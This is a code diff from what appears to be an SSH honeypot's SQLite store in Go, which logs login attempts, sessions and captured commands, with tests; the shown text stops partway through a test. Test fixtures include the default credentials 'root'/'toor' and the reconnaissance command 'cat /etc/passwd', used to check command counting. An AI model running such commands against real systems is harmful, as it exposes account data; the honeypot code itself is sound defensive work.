func (s *SQLiteStore) GetDashboardStats(ctx context.Context) (*DashboardStats, error) {
|
||||||
|
stats := &DashboardStats{}
|
||||||
|
|
||||||
|
err := s.db.QueryRowContext(ctx, `
|
||||||
|
SELECT COALESCE(SUM(count), 0), COUNT(DISTINCT ip)
|
||||||
|
FROM login_attempts`).Scan(&stats.TotalAttempts, &stats.UniqueIPs)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying attempt stats: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
err = s.db.QueryRowContext(ctx, `SELECT COUNT(*) FROM sessions`).Scan(&stats.TotalSessions)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying total sessions: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
err = s.db.QueryRowContext(ctx, `
|
||||||
|
SELECT COUNT(*) FROM sessions WHERE disconnected_at IS NULL`).Scan(&stats.ActiveSessions)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying active sessions: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return stats, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetTopUsernames(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
return s.queryTopN(ctx, "username", limit)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetTopPasswords(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
return s.queryTopN(ctx, "password", limit)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetTopIPs(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
rows, err := s.db.QueryContext(ctx, `
|
||||||
|
SELECT ip, country, SUM(count) AS total
|
||||||
|
FROM login_attempts
|
||||||
|
GROUP BY ip
|
||||||
|
ORDER BY total DESC
|
||||||
|
LIMIT ?`, limit)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying top IPs: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var entries []TopEntry
|
||||||
|
for rows.Next() {
|
||||||
|
var e TopEntry
|
||||||
|
if err := rows.Scan(&e.Value, &e.Country, &e.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning top IPs: %w", err)
|
||||||
|
}
|
||||||
|
entries = append(entries, e)
|
||||||
|
}
|
||||||
|
return entries, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetTopCountries(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
rows, err := s.db.QueryContext(ctx, `
|
||||||
|
SELECT country, SUM(count) AS total
|
||||||
|
FROM login_attempts
|
||||||
|
WHERE country != ''
|
||||||
|
GROUP BY country
|
||||||
|
ORDER BY total DESC
|
||||||
|
LIMIT ?`, limit)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying top countries: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var entries []TopEntry
|
||||||
|
for rows.Next() {
|
||||||
|
var e TopEntry
|
||||||
|
if err := rows.Scan(&e.Value, &e.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning top countries: %w", err)
|
||||||
|
}
|
||||||
|
entries = append(entries, e)
|
||||||
|
}
|
||||||
|
return entries, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) queryTopN(ctx context.Context, column string, limit int) ([]TopEntry, error) {
|
||||||
|
switch column {
|
||||||
|
case "username", "password", "ip":
|
||||||
|
// valid columns
|
||||||
|
default:
|
||||||
|
return nil, fmt.Errorf("invalid column: %s", column)
|
||||||
|
}
|
||||||
|
|
||||||
|
query := fmt.Sprintf(`
|
||||||
|
SELECT %s, SUM(count) AS total
|
||||||
|
FROM login_attempts
|
||||||
|
GROUP BY %s
|
||||||
|
ORDER BY total DESC
|
||||||
|
LIMIT ?`, column, column)
|
||||||
|
|
||||||
|
rows, err := s.db.QueryContext(ctx, query, limit)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying top %s: %w", column, err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var entries []TopEntry
|
||||||
|
for rows.Next() {
|
||||||
|
var e TopEntry
|
||||||
|
if err := rows.Scan(&e.Value, &e.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning top %s: %w", column, err)
|
||||||
|
}
|
||||||
|
entries = append(entries, e)
|
||||||
|
}
|
||||||
|
return entries, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetRecentSessions(ctx context.Context, limit int, activeOnly bool) ([]Session, error) {
|
||||||
|
query := `SELECT s.id, s.ip, s.country, s.username, s.shell_name, s.connected_at, s.disconnected_at, s.human_score, s.exec_command, COUNT(e.id) as event_count, COALESCE(SUM(CASE WHEN e.direction = 0 THEN LENGTH(e.data) ELSE 0 END), 0) as input_bytes FROM sessions s LEFT JOIN session_events e ON s.id = e.session_id`
|
||||||
|
if activeOnly {
|
||||||
|
query += ` WHERE s.disconnected_at IS NULL`
|
||||||
|
}
|
||||||
|
query += ` GROUP BY s.id ORDER BY s.connected_at DESC LIMIT ?`
|
||||||
|
|
||||||
|
return s.scanSessions(ctx, query, limit)
|
||||||
|
}
|
||||||
|
|
||||||
|
// buildSessionWhereClause builds a dynamic WHERE clause for session filtering.
|
||||||
|
func buildSessionWhereClause(f DashboardFilter, activeOnly bool) (string, []any) {
|
||||||
|
var clauses []string
|
||||||
|
var args []any
|
||||||
|
|
||||||
|
if activeOnly {
|
||||||
|
clauses = append(clauses, "s.disconnected_at IS NULL")
|
||||||
|
}
|
||||||
|
if f.Since != nil {
|
||||||
|
clauses = append(clauses, "s.connected_at >= ?")
|
||||||
|
args = append(args, f.Since.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
if f.Until != nil {
|
||||||
|
clauses = append(clauses, "s.connected_at <= ?")
|
||||||
|
args = append(args, f.Until.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
if f.IP != "" {
|
||||||
|
clauses = append(clauses, "s.ip = ?")
|
||||||
|
args = append(args, f.IP)
|
||||||
|
}
|
||||||
|
if f.Country != "" {
|
||||||
|
clauses = append(clauses, "s.country = ?")
|
||||||
|
args = append(args, f.Country)
|
||||||
|
}
|
||||||
|
if f.Username != "" {
|
||||||
|
clauses = append(clauses, "s.username = ?")
|
||||||
|
args = append(args, f.Username)
|
||||||
|
}
|
||||||
|
if f.HumanScoreAboveZero {
|
||||||
|
clauses = append(clauses, "s.human_score > 0")
|
||||||
|
}
|
||||||
|
|
||||||
|
if len(clauses) == 0 {
|
||||||
|
return "", nil
|
||||||
|
}
|
||||||
|
return " WHERE " + strings.Join(clauses, " AND "), args
|
||||||
|
}
|
||||||
|
|
||||||
|
// validSessionSorts maps allowed SortBy values to SQL ORDER BY clauses.
|
||||||
|
var validSessionSorts = map[string]string{
|
||||||
|
"connected_at": "s.connected_at DESC",
|
||||||
|
"input_bytes": "input_bytes DESC",
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetFilteredSessions(ctx context.Context, limit int, activeOnly bool, f DashboardFilter) ([]Session, error) {
|
||||||
|
where, args := buildSessionWhereClause(f, activeOnly)
|
||||||
|
args = append(args, limit)
|
||||||
|
|
||||||
|
orderBy := validSessionSorts["connected_at"]
|
||||||
|
if mapped, ok := validSessionSorts[f.SortBy]; ok {
|
||||||
|
orderBy = mapped
|
||||||
|
}
|
||||||
|
|
||||||
|
//nolint:gosec // where/order clauses built from allowlisted constants, not raw user input
|
||||||
|
query := `SELECT s.id, s.ip, s.country, s.username, s.shell_name, s.connected_at, s.disconnected_at, s.human_score, s.exec_command, COUNT(e.id) as event_count, COALESCE(SUM(CASE WHEN e.direction = 0 THEN LENGTH(e.data) ELSE 0 END), 0) as input_bytes FROM sessions s LEFT JOIN session_events e ON s.id = e.session_id` + where + ` GROUP BY s.id ORDER BY ` + orderBy + ` LIMIT ?`
|
||||||
|
|
||||||
|
return s.scanSessions(ctx, query, args...)
|
||||||
|
}
|
||||||
|
|
||||||
|
// scanSessions executes a session query and scans the results.
|
||||||
|
func (s *SQLiteStore) scanSessions(ctx context.Context, query string, args ...any) ([]Session, error) {
|
||||||
|
rows, err := s.db.QueryContext(ctx, query, args...)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying sessions: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var sessions []Session
|
||||||
|
for rows.Next() {
|
||||||
|
var sess Session
|
||||||
|
var connectedAt string
|
||||||
|
var disconnectedAt sql.NullString
|
||||||
|
var humanScore sql.NullFloat64
|
||||||
|
var execCommand sql.NullString
|
||||||
|
if err := rows.Scan(&sess.ID, &sess.IP, &sess.Country, &sess.Username, &sess.ShellName, &connectedAt, &disconnectedAt, &humanScore, &execCommand, &sess.EventCount, &sess.InputBytes); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning session: %w", err)
|
||||||
|
}
|
||||||
|
sess.ConnectedAt, _ = time.Parse(time.RFC3339, connectedAt)
|
||||||
|
if disconnectedAt.Valid {
|
||||||
|
t, _ := time.Parse(time.RFC3339, disconnectedAt.String)
|
||||||
|
sess.DisconnectedAt = &t
|
||||||
|
}
|
||||||
|
if humanScore.Valid {
|
||||||
|
sess.HumanScore = &humanScore.Float64
|
||||||
|
}
|
||||||
|
if execCommand.Valid {
|
||||||
|
sess.ExecCommand = &execCommand.String
|
||||||
|
}
|
||||||
|
sessions = append(sessions, sess)
|
||||||
|
}
|
||||||
|
return sessions, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetTopExecCommands(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
rows, err := s.db.QueryContext(ctx, `
|
||||||
|
SELECT exec_command, COUNT(*) as total
|
||||||
|
FROM sessions
|
||||||
|
WHERE exec_command IS NOT NULL
|
||||||
|
GROUP BY exec_command
|
||||||
|
ORDER BY total DESC
|
||||||
|
LIMIT ?`, limit)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying top exec commands: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var entries []TopEntry
|
||||||
|
for rows.Next() {
|
||||||
|
var e TopEntry
|
||||||
|
if err := rows.Scan(&e.Value, &e.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning top exec commands: %w", err)
|
||||||
|
}
|
||||||
|
entries = append(entries, e)
|
||||||
|
}
|
||||||
|
return entries, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) CloseActiveSessions(ctx context.Context, disconnectedAt time.Time) (int64, error) {
|
||||||
|
res, err := s.db.ExecContext(ctx, `
|
||||||
|
UPDATE sessions SET disconnected_at = ? WHERE disconnected_at IS NULL`,
|
||||||
|
disconnectedAt.UTC().Format(time.RFC3339))
|
||||||
|
if err != nil {
|
||||||
|
return 0, fmt.Errorf("closing active sessions: %w", err)
|
||||||
|
}
|
||||||
|
return res.RowsAffected()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetAttemptsOverTime(ctx context.Context, days int, since, until *time.Time) ([]TimeSeriesPoint, error) {
|
||||||
|
query := `SELECT DATE(last_seen) AS d, SUM(count) FROM login_attempts WHERE 1=1`
|
||||||
|
var args []any
|
||||||
|
|
||||||
|
if since != nil {
|
||||||
|
query += ` AND last_seen >= ?`
|
||||||
|
args = append(args, since.UTC().Format(time.RFC3339))
|
||||||
|
} else {
|
||||||
|
query += ` AND last_seen >= ?`
|
||||||
|
args = append(args, time.Now().UTC().AddDate(0, 0, -days).Format("2006-01-02"))
|
||||||
|
}
|
||||||
|
if until != nil {
|
||||||
|
query += ` AND last_seen <= ?`
|
||||||
|
args = append(args, until.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
query += ` GROUP BY d ORDER BY d`
|
||||||
|
|
||||||
|
rows, err := s.db.QueryContext(ctx, query, args...)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying attempts over time: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var points []TimeSeriesPoint
|
||||||
|
for rows.Next() {
|
||||||
|
var dateStr string
|
||||||
|
var p TimeSeriesPoint
|
||||||
|
if err := rows.Scan(&dateStr, &p.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning time series point: %w", err)
|
||||||
|
}
|
||||||
|
p.Timestamp, _ = time.Parse("2006-01-02", dateStr)
|
||||||
|
points = append(points, p)
|
||||||
|
}
|
||||||
|
return points, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetHourlyPattern(ctx context.Context, since, until *time.Time) ([]HourlyCount, error) {
|
||||||
|
query := `SELECT CAST(STRFTIME('%H', last_seen) AS INTEGER) AS h, SUM(count) FROM login_attempts WHERE 1=1`
|
||||||
|
var args []any
|
||||||
|
|
||||||
|
if since != nil {
|
||||||
|
query += ` AND last_seen >= ?`
|
||||||
|
args = append(args, since.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
if until != nil {
|
||||||
|
query += ` AND last_seen <= ?`
|
||||||
|
args = append(args, until.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
query += ` GROUP BY h ORDER BY h`
|
||||||
|
|
||||||
|
rows, err := s.db.QueryContext(ctx, query, args...)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying hourly pattern: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var counts []HourlyCount
|
||||||
|
for rows.Next() {
|
||||||
|
var c HourlyCount
|
||||||
|
if err := rows.Scan(&c.Hour, &c.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning hourly count: %w", err)
|
||||||
|
}
|
||||||
|
counts = append(counts, c)
|
||||||
|
}
|
||||||
|
return counts, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetCountryStats(ctx context.Context) ([]CountryCount, error) {
|
||||||
|
rows, err := s.db.QueryContext(ctx, `
|
||||||
|
SELECT country, SUM(count) AS total
|
||||||
|
FROM login_attempts
|
||||||
|
WHERE country != ''
|
||||||
|
GROUP BY country
|
||||||
|
ORDER BY total DESC`)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying country stats: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var counts []CountryCount
|
||||||
|
for rows.Next() {
|
||||||
|
var c CountryCount
|
||||||
|
if err := rows.Scan(&c.Country, &c.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning country count: %w", err)
|
||||||
|
}
|
||||||
|
counts = append(counts, c)
|
||||||
|
}
|
||||||
|
return counts, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
// buildAttemptWhereClause builds a dynamic WHERE clause for login_attempts filtering.
|
||||||
|
func buildAttemptWhereClause(f DashboardFilter) (string, []any) {
|
||||||
|
var clauses []string
|
||||||
|
var args []any
|
||||||
|
|
||||||
|
if f.Since != nil {
|
||||||
|
clauses = append(clauses, "last_seen >= ?")
|
||||||
|
args = append(args, f.Since.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
if f.Until != nil {
|
||||||
|
clauses = append(clauses, "last_seen <= ?")
|
||||||
|
args = append(args, f.Until.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
if f.IP != "" {
|
||||||
|
clauses = append(clauses, "ip = ?")
|
||||||
|
args = append(args, f.IP)
|
||||||
|
}
|
||||||
|
if f.Country != "" {
|
||||||
|
clauses = append(clauses, "country = ?")
|
||||||
|
args = append(args, f.Country)
|
||||||
|
}
|
||||||
|
if f.Username != "" {
|
||||||
|
clauses = append(clauses, "username = ?")
|
||||||
|
args = append(args, f.Username)
|
||||||
|
}
|
||||||
|
|
||||||
|
if len(clauses) == 0 {
|
||||||
|
return "", nil
|
||||||
|
}
|
||||||
|
|
||||||
|
return " WHERE " + strings.Join(clauses, " AND "), args
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetFilteredDashboardStats(ctx context.Context, f DashboardFilter) (*DashboardStats, error) {
|
||||||
|
where, args := buildAttemptWhereClause(f)
|
||||||
|
stats := &DashboardStats{}
|
||||||
|
|
||||||
|
err := s.db.QueryRowContext(ctx,
|
||||||
|
`SELECT COALESCE(SUM(count), 0), COUNT(DISTINCT ip) FROM login_attempts`+where, args...).
|
||||||
|
Scan(&stats.TotalAttempts, &stats.UniqueIPs)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying filtered attempt stats: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Sessions don't have username/password, so only filter by time, IP, country.
|
||||||
|
sessQuery := `SELECT COUNT(*) FROM sessions WHERE 1=1`
|
||||||
|
var sessArgs []any
|
||||||
|
if f.Since != nil {
|
||||||
|
sessQuery += ` AND connected_at >= ?`
|
||||||
|
sessArgs = append(sessArgs, f.Since.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
if f.Until != nil {
|
||||||
|
sessQuery += ` AND connected_at <= ?`
|
||||||
|
sessArgs = append(sessArgs, f.Until.UTC().Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
if f.IP != "" {
|
||||||
|
sessQuery += ` AND ip = ?`
|
||||||
|
sessArgs = append(sessArgs, f.IP)
|
||||||
|
}
|
||||||
|
if f.Country != "" {
|
||||||
|
sessQuery += ` AND country = ?`
|
||||||
|
sessArgs = append(sessArgs, f.Country)
|
||||||
|
}
|
||||||
|
|
||||||
|
err = s.db.QueryRowContext(ctx, sessQuery, sessArgs...).Scan(&stats.TotalSessions)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying filtered total sessions: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
err = s.db.QueryRowContext(ctx, sessQuery+` AND disconnected_at IS NULL`, sessArgs...).Scan(&stats.ActiveSessions)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying filtered active sessions: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return stats, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetFilteredTopUsernames(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
return s.queryFilteredTopN(ctx, "username", limit, f)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetFilteredTopPasswords(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
return s.queryFilteredTopN(ctx, "password", limit, f)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetFilteredTopIPs(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
where, args := buildAttemptWhereClause(f)
|
||||||
|
args = append(args, limit)
|
||||||
|
//nolint:gosec // where clause built from trusted constants, not user input
|
||||||
|
query := `SELECT ip, country, SUM(count) AS total FROM login_attempts` + where + ` GROUP BY ip ORDER BY total DESC LIMIT ?`
|
||||||
|
rows, err := s.db.QueryContext(ctx, query, args...)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying filtered top IPs: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var entries []TopEntry
|
||||||
|
for rows.Next() {
|
||||||
|
var e TopEntry
|
||||||
|
if err := rows.Scan(&e.Value, &e.Country, &e.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning filtered top IPs: %w", err)
|
||||||
|
}
|
||||||
|
entries = append(entries, e)
|
||||||
|
}
|
||||||
|
return entries, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetFilteredTopCountries(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
where, args := buildAttemptWhereClause(f)
|
||||||
|
countryClause := "country != ''"
|
||||||
|
if where == "" {
|
||||||
|
where = " WHERE " + countryClause
|
||||||
|
} else {
|
||||||
|
where += " AND " + countryClause
|
||||||
|
}
|
||||||
|
args = append(args, limit)
|
||||||
|
//nolint:gosec // where clause built from trusted constants, not user input
|
||||||
|
query := `SELECT country, SUM(count) AS total FROM login_attempts` + where + ` GROUP BY country ORDER BY total DESC LIMIT ?`
|
||||||
|
rows, err := s.db.QueryContext(ctx, query, args...)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying filtered top countries: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var entries []TopEntry
|
||||||
|
for rows.Next() {
|
||||||
|
var e TopEntry
|
||||||
|
if err := rows.Scan(&e.Value, &e.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning filtered top countries: %w", err)
|
||||||
|
}
|
||||||
|
entries = append(entries, e)
|
||||||
|
}
|
||||||
|
return entries, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) queryFilteredTopN(ctx context.Context, column string, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
switch column {
|
||||||
|
case "username", "password":
|
||||||
|
// valid columns
|
||||||
|
default:
|
||||||
|
return nil, fmt.Errorf("invalid column: %s", column)
|
||||||
|
}
|
||||||
|
|
||||||
|
where, args := buildAttemptWhereClause(f)
|
||||||
|
args = append(args, limit)
|
||||||
|
query := fmt.Sprintf(`
|
||||||
|
SELECT %s, SUM(count) AS total
|
||||||
|
FROM login_attempts%s
|
||||||
|
GROUP BY %s
|
||||||
|
ORDER BY total DESC
|
||||||
|
LIMIT ?`, column, where, column)
|
||||||
|
|
||||||
|
rows, err := s.db.QueryContext(ctx, query, args...)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying filtered top %s: %w", column, err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var entries []TopEntry
|
||||||
|
for rows.Next() {
|
||||||
|
var e TopEntry
|
||||||
|
if err := rows.Scan(&e.Value, &e.Count); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning filtered top %s: %w", column, err)
|
||||||
|
}
|
||||||
|
entries = append(entries, e)
|
||||||
|
}
|
||||||
|
return entries, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
func (s *SQLiteStore) Close() error {
|
func (s *SQLiteStore) Close() error {
|
||||||
return s.db.Close()
|
return s.db.Close()
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -23,17 +23,17 @@ func TestRecordLoginAttempt(t *testing.T) {
|
|||||||
ctx := context.Background()
|
ctx := context.Background()
|
||||||
|
|
||||||
// First attempt creates a new record.
|
// First attempt creates a new record.
|
||||||
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1"); err != nil {
|
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", ""); err != nil {
|
||||||
t.Fatalf("first attempt: %v", err)
|
t.Fatalf("first attempt: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
// Second attempt with same credentials increments count.
|
// Second attempt with same credentials increments count.
|
||||||
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1"); err != nil {
|
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", ""); err != nil {
|
||||||
t.Fatalf("second attempt: %v", err)
|
t.Fatalf("second attempt: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
// Different IP is a separate record.
|
// Different IP is a separate record.
|
||||||
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.2"); err != nil {
|
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.2", ""); err != nil {
|
||||||
t.Fatalf("different IP: %v", err)
|
t.Fatalf("different IP: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -62,7 +62,7 @@ func TestCreateAndEndSession(t *testing.T) {
|
|||||||
store := newTestStore(t)
|
store := newTestStore(t)
|
||||||
ctx := context.Background()
|
ctx := context.Background()
|
||||||
|
|
||||||
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "")
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "", "")
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("creating session: %v", err)
|
t.Fatalf("creating session: %v", err)
|
||||||
}
|
}
|
||||||
@@ -100,7 +100,7 @@ func TestUpdateHumanScore(t *testing.T) {
|
|||||||
store := newTestStore(t)
|
store := newTestStore(t)
|
||||||
ctx := context.Background()
|
ctx := context.Background()
|
||||||
|
|
||||||
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "")
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "", "")
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("creating session: %v", err)
|
t.Fatalf("creating session: %v", err)
|
||||||
}
|
}
|
||||||
@@ -123,7 +123,7 @@ func TestAppendSessionLog(t *testing.T) {
|
|||||||
store := newTestStore(t)
|
store := newTestStore(t)
|
||||||
ctx := context.Background()
|
ctx := context.Background()
|
||||||
|
|
||||||
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "")
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "", "")
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("creating session: %v", err)
|
t.Fatalf("creating session: %v", err)
|
||||||
}
|
}
|
||||||
@@ -159,7 +159,7 @@ func TestDeleteRecordsBefore(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Insert a recent login attempt.
|
// Insert a recent login attempt.
|
||||||
if err := store.RecordLoginAttempt(ctx, "new", "new", "2.2.2.2"); err != nil {
|
if err := store.RecordLoginAttempt(ctx, "new", "new", "2.2.2.2", ""); err != nil {
|
||||||
t.Fatalf("insert recent attempt: %v", err)
|
t.Fatalf("insert recent attempt: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -178,7 +178,7 @@ func TestDeleteRecordsBefore(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Insert a recent session.
|
// Insert a recent session.
|
||||||
if _, err := store.CreateSession(ctx, "2.2.2.2", "new", ""); err != nil {
|
if _, err := store.CreateSession(ctx, "2.2.2.2", "new", "", ""); err != nil {
|
||||||
t.Fatalf("insert recent session: %v", err)
|
t.Fatalf("insert recent session: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -204,12 +204,81 @@ func TestDeleteRecordsBefore(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func TestGetTopExecCommands(t *testing.T) {
|
||||||
|
store := newTestStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Create sessions with exec commands.
|
||||||
|
for range 3 {
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("creating session: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.SetExecCommand(ctx, id, "uname -a"); err != nil {
|
||||||
|
t.Fatalf("setting exec command: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
for range 2 {
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.2", "admin", "", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("creating session: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.SetExecCommand(ctx, id, "cat /etc/passwd"); err != nil {
|
||||||
|
t.Fatalf("setting exec command: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// Session without exec command — should not appear.
|
||||||
|
if _, err := store.CreateSession(ctx, "10.0.0.3", "test", "bash", ""); err != nil {
|
||||||
|
t.Fatalf("creating session: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
entries, err := store.GetTopExecCommands(ctx, 10)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetTopExecCommands: %v", err)
|
||||||
|
}
|
||||||
|
if len(entries) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(entries))
|
||||||
|
}
|
||||||
|
if entries[0].Value != "uname -a" || entries[0].Count != 3 {
|
||||||
|
t.Errorf("entries[0] = %+v, want uname -a:3", entries[0])
|
||||||
|
}
|
||||||
|
if entries[1].Value != "cat /etc/passwd" || entries[1].Count != 2 {
|
||||||
|
t.Errorf("entries[1] = %+v, want cat /etc/passwd:2", entries[1])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetRecentSessionsEventCount(t *testing.T) {
|
||||||
|
store := newTestStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("creating session: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Add some events.
|
||||||
|
events := []SessionEvent{
|
||||||
|
{SessionID: id, Timestamp: time.Now(), Direction: 0, Data: []byte("ls\n")},
|
||||||
|
{SessionID: id, Timestamp: time.Now(), Direction: 1, Data: []byte("file1\n")},
|
||||||
|
}
|
||||||
|
if err := store.AppendSessionEvents(ctx, events); err != nil {
|
||||||
|
t.Fatalf("appending events: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
